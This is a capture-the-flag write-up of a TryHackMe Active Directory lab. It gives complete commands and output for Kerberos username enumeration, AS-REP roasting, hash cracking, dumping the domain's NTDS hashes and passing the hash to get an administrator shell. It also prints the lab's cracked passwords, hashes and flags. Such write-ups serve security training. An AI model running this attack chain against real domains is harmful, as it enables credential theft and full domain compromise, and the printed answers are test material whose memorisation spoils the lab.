Home TryHackMe - Attackive directory
Post
Cancel

TryHackMe - Attackive directory

This room from TryHackMe cover attacks against a basic misconfigured Domain Controller via Kerberos enumeration, AS-REP Roasting, Impacket and Evil-WinRM.

Setup

1
2
3
4
5
6
# Impacket
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ 
pip3 install .
python3 setup.py install

Enumeration

Nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
$ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN attackive-directory-full-port-scan.txt 10.10.193.110
Warning: 10.10.193.110 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.193.110
Host is up (0.037s latency).
Not shown: 64568 closed ports, 940 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-19 02:26:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-05-19T02:28:37+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2021-05-18T02:20:39
|_Not valid after:  2021-11-17T02:20:39
|_ssl-date: 2021-05-19T02:28:51+00:00; +1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49812/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-05-19T02:28:37
|_  start_date: N/A

Welcome to Attacktive Directory

What tool will allow us to enumerate port 139/445?

enum4linux

What is the NetBIOS-Domain Name of the machine?

Via enum4linux:

NetBIOS Domain Name

What invalid TLD do people commonly use for their Active Directory Domain?

.local


Enumerating Users via Kerberos

Wordlists provided:

What command within Kerbrute will allow us to enumerate valid usernames?

userenum

What notable account is discovered? (These should jump out at you)

ldapsearch

Do not forget to add IP spookysec.local into /etc/hosts

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ ./kerbrute_linux_amd64 userenum --dc spookysec.local -d THM-AD userlist.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 05/19/21 - Ronnie Flathers @ropnop

2021/05/19 04:49:28 >  Using KDC(s):
2021/05/19 04:49:28 >   spookysec.local:88

2021/05/19 04:49:29 >  [+] VALID USERNAME:       james@THM-AD
2021/05/19 04:49:29 >  [+] VALID USERNAME:       svc-admin@THM-AD
2021/05/19 04:49:30 >  [+] VALID USERNAME:       James@THM-AD
2021/05/19 04:49:30 >  [+] VALID USERNAME:       robin@THM-AD
2021/05/19 04:49:34 >  [+] VALID USERNAME:       darkstar@THM-AD
2021/05/19 04:49:36 >  [+] VALID USERNAME:       administrator@THM-AD
2021/05/19 04:49:40 >  [+] VALID USERNAME:       backup@THM-AD
2021/05/19 04:49:42 >  [+] VALID USERNAME:       paradox@THM-AD
2021/05/19 04:49:54 >  [+] VALID USERNAME:       JAMES@THM-AD
2021/05/19 04:49:58 >  [+] VALID USERNAME:       Robin@THM-AD
2021/05/19 04:50:23 >  [+] VALID USERNAME:       Administrator@THM-AD
2021/05/19 04:51:19 >  [+] VALID USERNAME:       Darkstar@THM-AD
2021/05/19 04:51:34 >  [+] VALID USERNAME:       Paradox@THM-AD
2021/05/19 04:52:27 >  [+] VALID USERNAME:       DARKSTAR@THM-AD
2021/05/19 04:52:44 >  [+] VALID USERNAME:       ori@THM-AD
2021/05/19 04:53:14 >  [+] VALID USERNAME:       ROBIN@THM-AD
2021/05/19 04:54:25 >  Done! Tested 73317 usernames (16 valid) in 296.440 seconds

The answer is svc-admin

What is the other notable account is discovered? (These should jump out at you)

backup


Exploitation (Abusing Kerberos)

I highly recommand to watch this VbScrub - Kerberos YouTube playlist before continuing.

And for french readers, this article from hackndo’s blog: AS-REP Roasting

AS-REP Roasting occurs when a user account has the privilege “Does not require Pre-Authentication” set.

This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

To take advantage of this, we’ll use GetNPUsers.py (from Impacket) that will allow us to query AS-REP Roastable accounts from the Key Distribution Center.

Note:The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ locate GetNPUsers.py
/usr/local/bin/GetNPUsers.py
/usr/local/bin/GetNPUsers.pyc
/usr/share/doc/python3-impacket/examples/GetNPUsers.py
$ python3 /usr/local/bin/GetNPUsers.py spookysec.local/svc-admin -request -dc-ip $TARGET -no-pass
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:b4c31112ac39aae6cc44a1ee38b898d8$cbdf8ee2166813e2ba6fe8e385f1469d3dbeed4a676a9068c528ab383cf9ae32bffe15ef9b35758c7a2a00c800752004aba07284913712bb68eb4e8f78f41a050bc87f8e3d8599817efcac36b410e56b5927564929f7e5c61b1179db7dd4e6a97e8de381244e145bc0562d31b261f9bbf945f41b89c9a9b0875e35bc35456518acac08a79e03948fd9906eb72f3fbe2a88399f4c1a54f7f2448d79e20979048ff3c4053527c582677c7403a02615a92d8e204c756645849112f8de087e1791909dcf5945a93fffadc60fe94a54f834d4794dd5fce7d36fceb2ac2d591a222b360b0ddcd085aaa7f753f5e868ffa01f3cc4a8
$ python3 /usr/local/bin/GetNPUsers.py spookysec.local/backup -request -dc-ip $TARGET -no-pass
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for backup
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

svc-admin

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

Kerberos 5 AS-REP etype 23

krb5asrep

What mode is the hash?

18200

Now crack the hash with the modified password list provided, what is the user accounts password?

1
2
3
4
$ hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
...
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:b4c31112ac39aae6cc44a1ee38b898d8$cbdf8ee2166813e2ba6fe8e385f1469d3dbeed4a676a9068c528ab383cf9ae32bffe15ef9b35758c7a2a00c800752004aba07284913712bb68eb4e8f78f41a050bc87f8e3d8599817efcac36b410e56b5927564929f7e5c61b1179db7dd4e6a97e8de381244e145bc0562d31b261f9bbf945f41b89c9a9b0875e35bc35456518acac08a79e03948fd9906eb72f3fbe2a88399f4c1a54f7f2448d79e20979048ff3c4053527c582677c7403a02615a92d8e204c756645849112f8de087e1791909dcf5945a93fffadc60fe94a54f834d4794dd5fce7d36fceb2ac2d591a222b360b0ddcd085aaa7f753f5e868ffa01f3cc4a8:management2005
..

Enumration (Back to the Basics)

Using utility can we map remote SMB shares?

smbclient

Which option will list shares?

-L

How many remote shares is the server listing?

There are 6

smbclient

There is one particular share that we have access to that contains a text file. Which share is it?

1
2
3
4
5
6
7
8
9
10
$ smbclient //10.10.193.110/backup -U 'svc-admin%management2005'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 21:08:39 2020
  ..                                  D        0  Sat Apr  4 21:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 21:08:53 2020

                8247551 blocks of size 4096. 3930770 blocks available
smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

What is the content of the file?

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding the contents of the file, what is the full contents?

backup@spookysec.local:backup2517860

backup_credentials.txt


Elevating Privileges within the Domain

Now that we have new user account credentials, we may have more privileges on the system than before.

Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ python3 /usr/local/bin/secretsdump.py -just-dc-ntlm spookysec.local/backup:backup2517860@$TARGET
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:0942ad72c183935a736ea0a211fabdec:::

What method allowed us to dump NTDS.DIT?

DRSUAPI

What is the Administrators NTLM hash?

0e0363213e37b94221497260b0bcb4fc

What method of attack could allow us to authenticate as the user without the password?

Pass The Hash

Using a tool called Evil-WinRM what option will allow us to use a hash?

-H

1
2
3
4
5
6
7
8
root@kali:~/thm/attackive-directory# evil-winrm -i $TARGET -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Documents> whoami
thm-ad\administrator

secretsdump


Flag Submission Panel

svc-admin

1
2
3
4
5
6
7
8
9
10
11
12
13
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-admin\Desktop> dir


    Directory: C:\Users\svc-admin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt


[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc-admin\Desktop> type user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}

backup

1
2
3
4
5
6
7
8
9
10
11
12
13
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\backup\Desktop> dir


    Directory: C:\Users\backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt


[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\backup\Desktop> type PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}

Administrator

1
2
3
4
5
6
7
8
9
10
11
12
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> dir                                                                                      
                                                                                                                                                             
                                                                                                                                                             
    Directory: C:\Users\Administrator\Desktop                                                                                                                
                                                                                                                                                             
                                                                                                                                                             
Mode                LastWriteTime         Length Name                                                                                                        
----                -------------         ------ ----                                                                                                        
-a----         4/4/2020  11:39 AM             32 root.txt                                                                                                    
                                                                                                                                                             
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\Administrator\Desktop> type root.txt
TryHackMe{4ctiveD1rectoryM4st3r}

Tools


This post is licensed under 0x3n0 by the author.

The invisible war

Cyber Apocalypse CTF 2021 - Minefield (Pwn)